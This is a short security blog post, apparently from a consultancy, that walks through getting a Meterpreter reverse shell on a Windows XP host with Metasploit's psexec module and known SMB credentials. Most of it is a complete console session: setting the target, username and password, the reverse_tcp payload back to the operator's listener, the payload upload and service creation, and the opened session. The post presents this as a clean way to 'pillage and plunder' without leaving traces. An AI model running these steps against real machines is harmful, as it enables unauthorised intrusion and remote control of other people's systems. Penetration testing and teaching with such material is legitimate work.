Talk to a Security Expert Now: (800) 721-9177

Get a Meterpreter Shell Using SMB Credentials

The Meterpreter shell in Metasploit is a fantastic way to interact with a compromised box. It runs entirely in memory and leaves no trace of itself after you disconnect, allowing you to pillage and plunder cleanly without leaving any tracks.

I find myself using it fairly frequently against Windows machines that I’ve already gotten credentials for via some other means. In those cases it doesn’t make sense to use an actual exploit to get a Meterpreter shell going.

Use the psexec exploit (which actually isn’t an exploit, but whatever) to accomplish this:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 10.10.0.122
rhost => 10.10.0.122
msf exploit(psexec) > set smbpass Changem3
smbpass => Changem3
msf exploit(psexec) > set smbuser mark
smbuser => mark
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOST      10.10.0.122      yes       The target address
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
SMBPass    Changem3         no        The password for the specified username
SMBUser    mark             no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST     10.10.0.149      yes       The listen address
LPORT     4444             yes       The listen port
msf exploit(psexec) > exploit

[*] Started reverse handler on 10.10.0.149:4444
[*] Connecting to the server...
[*] Authenticating to 10.10.0.122:445|WORKGROUP as user 'mark'...
[*] Uploading payload...
[*] Created OUBfKBZr.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:10.10.0.122[sv
cctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:10.10.0.122[svcc
tl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PWFeuNyE - "MthJLAgTDPzWvZXfaw")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (749056 bytes) to 10.10.0.122
[*] Deleting OUBfKBZr.exe...
[*] Meterpreter session 1 opened (10.10.0.149:4444 -> 10.10.0.122:1052) at 2011-
03-13 17:08:13 -0700
meterpreter > sysinfo
Computer   : EARTH
OS         : Windows XP (Build 2600, Service Pack 3).
Arch       : x86
Language   : en_US
Meterpreter: x86/win32

File and Print Sharing (445/tcp) needs to be enabled on the target host (duh) or this obviously won’t work.

Related Posts

Defcon: Advanced Format String Attacks

Format string attacks remain difficult in both software and hackademic exercises as the techniques have not improved since their discovery. This session demonstrates advanced format string attack techniques designed to automate the process from creation to compromise as well as incorporate those techniques into the Metasploit framework. The audience is encouraged to bring a basic understanding of format string attacks in order to leave the presentation with the tools necessary to never write one again.

OWASP Live CD

I need to express my love for OWASP's Live CD (aka OWASP Web Testing Environment). …

This Post Has 0 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Back To Top